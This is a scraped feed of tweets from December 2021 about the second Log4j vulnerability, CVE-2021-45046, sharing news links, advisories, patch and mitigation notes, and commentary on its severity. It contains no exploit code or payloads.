2021-12-15 05:44:20Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released: The Apache Software Foundation (ASF) h… https://t.co/MuUyM2hB0l https://twitter.com/i/web/status/1470989761141637121shah_sheikh
2021-12-15 05:44:15Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released: The Apache Software Foundation (ASF) h… https://t.co/3b9X21KArz https://twitter.com/i/web/status/1470989761854652422cipherstorm
2021-12-15 05:44:11Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/hzJ9199i5e https://t.co/KvdUXUkyuJ https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html?utm_source=dlvr.it&utm_medium=twitterRigneySec
2021-12-15 05:43:59Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/yTzMn290CW The Apache Soft… https://t.co/T2x0AHADb7 https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html https://twitter.com/i/web/status/1470989888417787909M157q_News_RSS
2021-12-15 05:43:50Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/8UbkWCzsGV https://t.co/RpmWYWI4mQ http://dlvr.it/SFP8mfAcooEdi
2021-12-15 05:43:45Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released: The Apache Software Foundation (ASF) h… https://t.co/8NW2MwfXsZ https://twitter.com/i/web/status/1470990020408348676mi6rogue
2021-12-15 05:43:41Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/SLrnk0bGe6 https://t.co/TGxwR60hIT https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlthedpsadvisors
2021-12-15 05:43:37Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/D8C43cq0Yu https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlCyberologist_en
2021-12-15 05:43:08Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/Uj0rADuePT https://www.itsecuritynews.info/second-log4j-vulnerability-cve-2021-45046-discovered-new-patch-released/IT_securitynews
2021-12-15 05:43:05Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/7E0NrDRnbX http://dlvr.it/SFP8w0akbarth3great
2021-12-15 05:43:02Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/o8vbNJYl5G http://dlvr.it/SFP8wsSupportDataNV
2021-12-15 05:42:53URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for #Log4j utility after the previous patch for t… https://t.co/Jl4DEsAyBG https://twitter.com/i/web/status/1470990491688652800TheHackersNews
2021-12-15 05:42:26Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/TfI4QiA8Kh https://gixtools.net/2021/12/second-log4j-vulnerability-cve-2021-45046-discovered-new-patch-released/gixtools
2021-12-15 05:42:03Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/uVANWXuAhi https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlsenthenes
2021-12-15 05:41:57Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/YUmxaTYs7k https://bit.ly/3oVtC4ppigram86
2021-12-15 05:41:38#Blockchain #Crypto #Bitcoin #Ethereum #Trading Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch… https://t.co/s072azeCe1 https://twitter.com/i/web/status/1470990903716233219leboncoincrypto
2021-12-15 05:41:35Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released: https://t.co/4Vrc3GWJ0P by The Hacker… https://t.co/KG42mkQAb5 https://ift.tt/3IT5WFC https://twitter.com/i/web/status/1470990934976483328Alevskey
2021-12-15 05:41:26Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/JXyKJ5uitm https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlohhara_shiojiri
2021-12-15 05:41:24https://t.co/L0xZZ3Ejkv Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released #cybersecurity https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlnetsecu
2021-12-15 05:41:18Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/ysw4Mcaf6E https://newsaxes.com/second-log4j-vulnerability-cve-2021-45046-found-new-patch-launched/newsaxes
2021-12-15 05:40:47"URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for #Log4j utility after the previous patch for… https://t.co/uceomHKi0f https://twitter.com/i/web/status/1470991416067244036trip_elix
2021-12-15 05:40:21Patch your servers ASAP. URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after… https://t.co/sBmqueK2GN https://twitter.com/i/web/status/1470991774260805635MTpokerface
2021-12-15 05:40:12URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after the previous patch for th… https://t.co/Xms1ARi8Zv https://twitter.com/i/web/status/1470991800936669184ChileSobreTodo
2021-12-15 05:30:50@phishy @WoogyChuck @CubicleApril Because Log4J CVE-2021-44228 and CVE-2021-45046 ?tenrobots
2021-12-15 05:30:33#CyberSecurity #Security #News : Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/gealc09hpq https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html4ng3n01r3
2021-12-15 05:20:38Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Sh https://t.co/WnKrMG04mR (https://t.co/Qy9ZoY2IBG) https://bit.ly/3q0PPgA https://bit.ly/3DWdovWnewsyc100
2021-12-15 05:15:19No, you don't need to panic about CVE-2021-45046: 1) almost no app has a log4j2.xml with a ${ctx:variable} pattern… https://t.co/DEs6qRkju3 https://twitter.com/i/web/status/1470983455748018184zhuowei
2021-12-15 05:02:35PoC for CVE-2021-45046, the #Log4j 2.15.0 PatternLayout Context Lookup bug: https://t.co/AXiNL9M52U https://t.co/nHVFT3WgH3 https://replit.com/@ZhuoweiZhang/Log4jThreadContextzhuowei
2021-12-15 05:00:31supporting log4j 2.15.0 vulnerability(CVE-2021-45046) detection and zip file scanning8con
2021-12-15 04:52:59#Log4j just keeps getting more insane. #CVE-2021-45046OverusedNamex
2021-12-15 04:43:28Round 2 Log4Shell Update: 🚨 Second 🚨 log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046)… https://t.co/Gn7ax9MPzG https://twitter.com/i/web/status/1470976044161191937greyhathackr
2021-12-15 04:40:52おかわりのDoS CVE出てた CVE - CVE-2021-45046 https://t.co/q6YEOUMcPo https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046ys3669_
2021-12-15 04:24:25Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/CnXTfG14kP https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/netalexx
2021-12-15 04:24:03Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/bQs86x9Q1S #technews… https://t.co/DDxxj6bmlZ https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ https://twitter.com/i/web/status/1470967078291410948Presbot1
2021-12-15 04:21:51Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/Pl5M0imvBr https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/newsycombinator
2021-12-15 04:19:50Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/42va9c6GkD https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/joakinen
2021-12-15 04:18:39“Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec” https://t.co/uWlZ6fmvkt https://htn.to/4myxP7C3t9tkusano
2021-12-15 04:07:16Poster: freeqaz Title: Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) URL: https://t.co/xj816Uwr2R https://news.ycombinator.com/item?id=29561532top_hn_bot
2021-12-15 04:03:26Security Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/0h9o4nPHvd https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/_r_netsec
2021-12-15 04:01:58Security Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) via /r/netsec… https://t.co/OJoitB18Xo https://twitter.com/i/web/status/1470966711763488771CybrXx0
2021-12-15 03:55:12もう使うのやめればいいのに > 「CVE-2021-45046」は、13日付けでリースされた「Log4j 2.16.0」で対処されている。システムプロパティ「log4j2.noFormatMsgLookup」を「true」に変更… https://t.co/RLH1eS04i0 https://twitter.com/i/web/status/1470963560193064961sockety_v
2021-12-15 03:53:55New top story! Poster: freeqaz Title: Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2)… https://t.co/9qkmNWd5w9 https://twitter.com/i/web/status/1470963885188468738top_hn_bot
2021-12-15 03:52:53New post: "Security Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2)" https://t.co/GpTjKvbcoS https://ift.tt/3dQPs2qMyinfosecfeed
2021-12-15 03:17:44Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) L: https://t.co/QfGemgRiSd C: https://t.co/UAsF85JYbw https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ https://news.ycombinator.com/item?id=29561532hn_frontpage
2021-12-15 03:17:20Title: Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) 💬: Can someone explain what this is supposed to do?hncynic
2021-12-15 03:16:33Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/vc6jmByl1F 3 https://ift.tt/3pW2kdstammeke140674
2021-12-15 03:16:08Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/uq2y88vpgb 3 https://ift.tt/3pW2kdsknelsonvsi
2021-12-15 03:14:22Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/t9bk31FqfD 3 https://ift.tt/3pW2kdsradoncnotes
2021-12-15 03:12:56Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/jnScLQPjIJ https://t.co/nf58zIiSno https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/?utm_source=dlvr.it&utm_medium=twitterwinsontang
2021-12-15 03:12:29Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/BEnW060oX8 http://dlvr.it/SFNvsbakbarth3great
2021-12-15 03:10:12Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2): https://t.co/sn8Kz9TKHR Comments: https://t.co/xnQFfzTpx5 https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ https://news.ycombinator.com/item?id=29561532HNTweets
2021-12-15 02:45:33CVE-2021-45046 https://t.co/wNraEydv03 https://twitter.com/LunaSecIO/status/1470863392692867074hahwul
2021-12-15 02:30:57“CVE - CVE-2021-45046” https://t.co/d4O4oFKNyE https://htn.to/3NEELzeogzzu2
2021-12-15 02:23:01Deleted previous post. It was pointed out it could cause undo panic… New CVE: CVE-2021-45046… https://t.co/7svisBcBjW https://twitter.com/i/web/status/1470939306109898755w0mbat5eoul
2021-12-15 02:21:39NVD - CVE-2021-45046 https://t.co/tsW5EU4tX4 https://nvd.nist.gov/vuln/detail/CVE-2021-45046ohhara_shiojiri
2021-12-15 02:21:32@_mattata How is CVE-2021-45046 #Log4Shell2 if it requires non-default configuration and "only" leads to DOS not RCE?accessfinder
2021-12-15 02:21:25CVE - CVE-2021-45046 https://t.co/dAscKW09O3 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046ohhara_shiojiri
2021-12-15 02:12:40https://t.co/H6wJfYWEKF CVE-2021-45046の記載はまだ無いなあ。もう1回アップデートがあるかもしれない https://aws.amazon.com/jp/security/security-bulletins/AWS-2021-006/muziyoshiz
2021-12-15 02:12:28Here's our analysis and finding of the 2nd log4j vulnerability (CVE-2021-45046). We found this CVE still leaves you… https://t.co/NIQ4Qwnp6z https://twitter.com/i/web/status/1470937962472882177LunaSecIO
2021-12-15 02:12:20Log4jの新しい脆弱性情報 (CVE-2021-45046) か!? https://t.co/0liKp8KvuC https://www.cve.org/CVERecord?id=CVE-2021-45046nharuki
2021-12-15 02:02:12Good news: CVE-2021-45046 doesn't matter (DoS, nonstandard config), the hot patches work (https://t.co/oYR9mL20y1)… https://t.co/uGsvXz2Unn https://github.com/cloudsecurityalliance/gsd-database/blob/main/2021/1002xxx/GSD-2021-1002353.json https://twitter.com/i/web/status/1470935526530174977kurtseifried
2021-12-15 02:00:54Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228 & CVE-2021-45046) | LunaSec https://t.co/wU3hwtjnoa https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/chohkan
2021-12-15 01:52:39CVE-2021-45046 の方は OpenShift 4 は Not affected と。Red Hat さん情報早いな〜♪ https://t.co/uHIGgLKTJq https://access.redhat.com/security/cve/cve-2021-45046Santea3173
2021-12-15 01:52:07log4j 2.15 is also vulnerable(CVE-2021-45046) :( but, you can check this issue by using logpresso scanner https://t.co/ML5AmRvsan https://twitter.com/8con/status/14698834082184683558con
2021-12-15 01:51:37Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228 & CVE-2021-45046) | LunaSec https://t.co/dCK0NAIRpw https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/MasafumiNegishi
2021-12-15 01:51:33log4j 2.15 버전에서도 취약점이 발견되었다고 합니다. CVE-2021-45046 로그프레소 스캐너에는 2.15 버전을 탐지하고, 패치할 수 있는 기능까지 다 반영되었습니다. https://t.co/CxYRyYXRln https://twitter.com/8con/status/14698854262365552648con
2021-12-15 01:51:04CVE-2021-45046出てるじゃん…akino_R294
2021-12-15 01:42:282.15はCVE-2021-45046があるから、 2.16に更新するんやで。2.15にして安心じゃないので注意。shen_car
2021-12-15 01:41:10@_tallison Thanks for calling us out. Once we read CVE-2021-45046 it was clear that the safest and easiest to deal… https://t.co/R4uVz2cAiQ https://twitter.com/i/web/status/1470930430488625157dblockdotorg
2021-12-15 01:22:35https://t.co/y9vUFwTfwD Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228 & CVE-2021-45046) https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/satou30
2021-12-15 01:20:51📍CVE - CVE-2021-45046 #相互フォロー #拡散希望 【出所:はてなブックマーク / https://t.co/7lo6tDPxWD 厳選】 https://t.co/YE8c0REtBY http://Cho-News.info https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046ChoNewsHDK
2021-12-15 01:20:47lo4j2ちゃん…:CVE - CVE-2021-45046 https://t.co/KXOsSgjIX8 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046regtan
2021-12-15 01:11:49Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228 & CVE-2021-45046) | LunaSec https://t.co/mQytmwBWBe https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/piyokango
2021-12-15 01:11:31“CVE - CVE-2021-45046” https://t.co/C6MowhhqR0 https://htn.to/48kKJtxRVYkatsyoshi
2021-12-15 01:01:25CVE - CVE-2021-45046 https://t.co/9vsPrL0ZEc https://ift.tt/3F0iQ2kmagiauk
2021-12-15 01:00:31An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/shAkps18KQ https://twitter.com/i/web/status/1470920961100853254ProductCERT
2021-12-15 01:00:13CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of s… https://t.co/lxGzPU7FeZ https://twitter.com/i/web/status/1470921228370477061yasushia
2021-12-15 00:50:50CVE-2021-45046はRCEではなくDOSを引き起こす可能性がある模様。 引用RT元によれば、Amazon Correttoチームの作成したLog4jHotPatchなどを利用することでも、一旦は回避できそうでもある。 https://t.co/7Og7svWOdw https://github.com/corretto/hotpatch-for-apache-log4j2yamadamn
2021-12-15 00:50:36CVE-2021-44228(Log4Shell)対策でlog4j2.noFormatMsgLookup=trueで回避という情報があったけど、特定の条件下では防ぎきれないパターンがあるようでCVE-2021-45046として別に… https://t.co/x64guZvfw5 https://twitter.com/i/web/status/1470917468923502603minamijoyo
2021-12-15 00:50:13Hope it covers the new log4j recent addition of CVE-2021-45046 as well https://t.co/noU0e9iL9k #Log4Shell https://t.co/FJ7J8GfgJZ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 https://twitter.com/qualys/status/1470907218174398476ThierryDelaitre
2021-12-15 00:50:10We got so fast at releasing OpenSearch, why not do another one for CVE-2021-45046? #opensearch… https://t.co/7BxdtaWx5g https://twitter.com/i/web/status/1470918790024155147dblockdotorg
2021-12-15 00:41:05CVE-2021-45046 https://t.co/84WGUvCe4y によると、CVE-2021-44228に対処するための Log4j 2.15.0 の修正はデフォルト以外の特定の構成では不完全で -Dlog4j2.fo… https://t.co/Or2VbOMDAr https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 https://twitter.com/i/web/status/1470914285715210241yamadamn
2021-12-15 00:40:502件のコメント https://t.co/KhapYVMOID “CVE - CVE-2021-45046” https://t.co/wvQisoPwNl https://b.hatena.ne.jp/entry/s/cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046#utm_campaign=bookmark_share&utm_content=cve.mitre.org&utm_medium=social&utm_source=twitter&utm_term=%E3%83%86%E3%82%AF%E3%83%8E%E3%83%AD%E3%82%B8%E3%83%BC%20security https://htn.to/3VQGNaSHUmminamijoyo
2021-12-15 00:40:29あらら / “CVE - CVE-2021-45046” https://t.co/dUdWVUNIpH https://htn.to/4rsvLrSouTcheva
2021-12-15 00:40:25log4j 2.16.0 が出たのは CVE-2021-45046 のせいかな。kzm
2021-12-15 00:40:12A new version of OpenSearch will be released that updates Log4j 2.15.0 -> Log4j 2.16.0 due to CVE-2021-45046 (yup,… https://t.co/Er5HUDW5hh https://twitter.com/i/web/status/1470915645021700105stockholmux
2021-12-15 00:30:26次から次にクリスマス休暇時に大変だなこりゃ... CVE-2021-45046 https://t.co/QnMmLm965U https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046yuki_kawamitsu
2021-12-15 00:30:22CVE - CVE-2021-45046 https://t.co/z1r5iwa1j4 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046sutest1101
2021-12-15 00:20:48log4j2.noFormatMsgLookup=trueでは防げないDoS / “CVE - CVE-2021-45046” https://t.co/zJGclHQ1VE https://htn.to/25CcinSYRvfujiwara
2021-12-15 00:20:47CVE-2021-45046 よく分かんないな。 SystemProperty のスイッチだけの対応では不完全という趣旨のようだが……🤔 まあ基本的にはライブラリをバージョンアップしろ、なんだと思うが。nagise
2021-12-15 00:20:07CVE-2021-45046PerfectBoatJP
2021-12-15 00:10:07I declare CVE-2021-45046 to be named Transverse Rata https://t.co/0rLAZSn7PB https://nvd.nist.gov/vuln/detail/CVE-2021-45046vulnonym
2021-12-15 00:00:31まだちゃんと読んでないけど、MDCはかなり頻繁に使う機能なのでやな感じだ < CVE-2021-45046asano_ko
2021-12-15 00:00:17CVE-2021-45046: #Apache Log4j2 2.16.0 is out https://t.co/uD29ZJU4IC https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88fangsuman
2021-12-15 00:00:11CVE-2021-45046 とか出てきてるんだけど。。もうどうしたらいいのajim256
2021-12-14 23:51:04Based on this announcement, it’s not clear to me whether 2.15.0 is still vulnerable to RCE (not to CVE-2021-45046).… https://t.co/Qvdmk2ZSGa https://twitter.com/i/web/status/1470901631864782852jschauma
2021-12-14 23:50:52CVE-2021-45046 Log4j治りきってなかったか…ghetto_9912
2021-12-14 23:40:55CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of s… https://t.co/BdjNBAqch2 https://twitter.com/i/web/status/1470900389390258178ahmadraafat23
2021-12-14 23:20:25Just in case you missed it, a second log4j CVE was posted today. Tis the season and all that... CVE-2021-45046PrivacyL0st
2021-12-14 23:11:36#log4j #CVE-2021-44228 #CVE-2021-45046 https://t.co/r0zLl9OIWD_deftoner_
2021-12-14 22:50:41Just added rules for #log4j CVE-2021-45046! This rule looks for an Interpolator class which does not contain a Jnd… https://t.co/tz39Ha0OVS https://twitter.com/i/web/status/1470888766265085959Darkarnium
2021-12-14 22:50:22Please keep in mind that CVE-2021-45046 appears to only provide a DoS vector, rather than code execution (currently… https://t.co/71QSM6wERK https://twitter.com/i/web/status/1470888840999153664Darkarnium
2021-12-14 22:49:33CVE-2021-45046 🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃🙃AlexGlavind
2021-12-14 22:49:10CVE-2021-45046 para a versão 2.15 do Log4j - e lá vamos nós… https://t.co/AUGRmRPrAjdanieldalalana
2021-12-14 22:45:27New post from https://t.co/9KYxtdZjkl (CVE-2021-45046) has been published on https://t.co/SmAs59r0jj http://www.sesin.at https://www.sesin.at/2021/12/14/cve-2021-45046/www_sesin_at
2021-12-14 22:44:41New post from https://t.co/uXvPWJy6tj (CVE-2021-45046) has been published on https://t.co/bsMt6xlpCC http://www.sesin.at https://www.sesin.at/2021/12/14/cve-2021-45046/WolfgangSesin
2021-12-14 22:41:26@TenableSecurity does the log4shell nessus Plugin cover the CVE-2021-45046 ? #log4jwolfgang_604
2021-12-14 22:40:23apacheのサイト上でCVSS スコア 3.7の新しい脆弱性 CVE-2021-45046 が公開されたらしい。 https://t.co/bct1ZrWyaE https://t.co/vYLTYeUMQe https://logging.apache.org/log4j/2.x/security.html https://twitter.com/ymmt2005/status/1470854993054138368yama_bong
2021-12-14 22:32:42[Log4Shell log4j vulnerability (CVE-2021-44228 / CVE-2021-45046) - cheat-sheet reference guide - Tech Solvency](… https://t.co/tEfUoetXFv https://twitter.com/i/web/status/1470882414436417542lum7671
2021-12-14 22:26:18Log4j 2.15.0 is vulnerable! New CVE-2021-45046. Checkout Advisory #Log4Shell #log4j2HackerGautam
2021-12-14 22:20:17Does anyone know if CVE-2021-45046 is exploitable in the context of Minecraft? (Another log4j one) I'm guessing it… https://t.co/lO1frFxWyw https://twitter.com/i/web/status/1470881283849048064ThePaul_T
2021-12-14 22:07:24あら、CVE-2021-45046 が出てて、log4j 2.15.0 では完全ではなくて特定の設定下では脆弱性が残っているらしい。teramako
2021-12-14 22:05:45@AlyssaM_InfoSec Maybe should include about CVE-2021-45046 #log4j #secondvulnGauravAwakening
2021-12-14 22:02:50Second Log4j vulnerability discovered, patch already released | CVE-2021-45046 log4j2.noFormatMsgLookup` to `true`… https://t.co/ZzOtonW50i https://twitter.com/i/web/status/1470875519222693889fpientka
2021-12-14 22:02:00Log4j 2.15.0 is vulnerable! New CVE-2021-45046 https://t.co/nfVRwDMp6G https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046w0mbat5eoul
2021-12-14 21:58:21NVD - CVE-2021-45046 | 特定の構成だと2.15.0 に上げたり、 https://t.co/1hqWXPGruR https://nvd.nist.gov/vuln/detail/CVE-2021-45046chie_0218
2021-12-14 21:56:21NVD - CVE-2021-45046 | 特定の構成だと2.15.0に上げたり、元々提示されてた設定でも対処できないみたいです。2.16.0 にあげるしかないようです。 #log4j #脆弱性 #セキュリティ https://t.co/1hqWXPGruR https://nvd.nist.gov/vuln/detail/CVE-2021-45046chie_0218
2021-12-14 21:35:35CVE-2021-45046 in log4j v2.15.0. So in case you were still on the fence; computers were a mistake.KWF
2021-12-14 21:34:18New Log4j CVE published today: CVE-2021-45046 https://t.co/LVCX4ky5kh https://t.co/j19NbMB99k https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046itseccolin
2021-12-14 21:26:02We validated that this hotpatch also addresses CVE-2021-45046 https://t.co/L1bYNnofid Stay tuned for readme update… https://t.co/fLO6kz52IW https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f https://twitter.com/i/web/status/1470864704289476610yigalatz
2021-12-14 21:16:56@moe4kim Yesterday's hotfix removed the JndiLookup class as recommended by CVE-2021-45046.securityonion
2021-12-14 21:15:11Apache Log4jの脆弱性CVE-2021-44228の第二の脆弱性であるCVE-2021-45046が公開されました。 2.15では攻撃者がThread Context Map (MDC)の入力データを悪用できますので、2… https://t.co/ee85pn4Fqj https://twitter.com/i/web/status/1470861753659830275MasaKAMAYAMA
2021-12-14 21:11:07We just updated our Mitigation Guide with the 2nd log4j vulnerability (CVE-2021-45046). It's RCE for log4j <=2.14.… https://t.co/UCgRbxs4QQ https://twitter.com/i/web/status/1470863392692867074LunaSecIO
2021-12-14 21:00:42CVE-2021-45046. The patched log4j can still get network access.corr0si0n
2021-12-14 20:54:04CVE-2021-45046 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certai… https://t.co/Pc02Ftz23i https://twitter.com/i/web/status/1470856490860916746VulmonFeeds
2021-12-14 20:53:03CVE-2021-45046 :: log4j 2.16.0 CVE Score: 3.7 More fun.CGuntur
2021-12-14 20:45:19@Cthulhu_Sec Seems odd to word the description of CVE-2021-45046 to only apply to one single most-recent version of… https://t.co/4ZlMSJRaxF https://twitter.com/i/web/status/1470853710754553867wdormann
2021-12-14 20:43:19Just added rules for CVE-2021-45046! This rule looks for an Interpolator class which does not contain a JndiManage… https://t.co/Ck0CUpTVsq https://twitter.com/i/web/status/1470854610936078352Darkarnium
2021-12-14 20:41:04Please keep in mind that CVE-2021-45046 appears to only provide a DoS vector, rather than code execution! https://t.co/H1zvxlGTTi https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88fDarkarnium
2021-12-14 20:34:10New #log4j patch(CVE-2021-45046) for the old log4j patch(CVE-2021-44228) https://t.co/M7x4jXA4cl https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046JohnathanKuskos
2021-12-14 20:33:52So Log4j2.15 is vulnerable - CVE-2021-45046. An updated log4j2.16 has been released. Not as serious as CVE-2021-442… https://t.co/VFae7o3xOy https://twitter.com/i/web/status/1470852347618332672DenverHartlo
2021-12-14 20:33:07#Log4Shell #log4j CVE-2021-44228 A new Log4j CVE has been released - CVE-2021-45046 It covered a DoS vulnerability… https://t.co/pztCOfqVil https://twitter.com/i/web/status/1470852551859838977TomSellers
2021-12-14 20:31:39🤡New Log4j vuln.... ➡️CVSS: 3.7 ➡️CVE: CVE-2021-45046 ➡️Fixed Branch: 2.16.0 https://t.co/SRal22YsIv https://www.openwall.com/lists/oss-security/2021/12/14/4FullM3talPacket
2021-12-14 20:31:00@SonarQube CVE-2021-45046 >> https://t.co/BQrAV8z4vC https://t.co/LrvmhM5Sj2 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046moonbas3
2021-12-14 20:20:14Log4j 2.16.0 fixing CVE-2021-45046 https://t.co/SFyEHC06qb https://github.com/advisories/GHSA-7rjr-3q55-vv33twokilohertz
2021-12-14 20:16:32Previous fix for log4j 2.15.0 was incomplete in certain non default configurations so a new CVE raised: CVE-2021-45046.marcwrogers
2021-12-14 20:14:38The new CVE is CVE-2021-45046 : https://t.co/Vjfo3u0Jl8 Note: the mention of this being DOS would only be (mostly)… https://t.co/r0xoHkaDve https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 https://twitter.com/i/web/status/1470847336339415051seolsson
2021-12-14 20:11:09@joshbressers CVE-2021-45046 😭 https://t.co/jgybDUwgBb https://t.co/id3hn69rAN https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88fderkoe
2021-12-14 20:01:08CVE-2021-45046: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certai… https://t.co/srn9CfU8xI https://twitter.com/i/web/status/1470845397803446284SecurePeacock
2021-12-14 19:56:42CVE - CVE-2021-45046 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in… https://t.co/myZPTgdbEr https://twitter.com/i/web/status/1470839843915710478endi24
2021-12-14 19:54:55log4j 2.1.15 CVE-2021-45046: "The fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain… https://t.co/74Qis24Vxq https://twitter.com/i/web/status/1470841057462013954techsolvency
2021-12-14 19:54:32CVE-2021-45046 = Log4JarJarBinks?dragosr
2021-12-14 19:54:27AndroidProjectCreator 1.5.2-stable updates its #log4j dependency to version 2.16.0 to remediate CVE-2021-45046, whi… https://t.co/u6ZcvXTSXl https://twitter.com/i/web/status/1470841438678274049Libranalysis
2021-12-14 19:54:04asdf... CVE-2021-45046 just... faaasdasdasdfasdKevinSMcArthur
2021-12-14 19:52:18PSA - CVE-2021-45046: setting `log4j2.noFormatMsgLookup` to `true` do NOT mitigate this specific vulnerability https://t.co/ip4IsRYt8O https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046x0rz
2021-12-14 19:33:57Apache Log4j has updated their security page with a new vulnerability (CVE-2021-45046) related to CVE-2021-44228. T… https://t.co/4KoA3k1ViI https://twitter.com/i/web/status/1470836568265003013zidane007nl
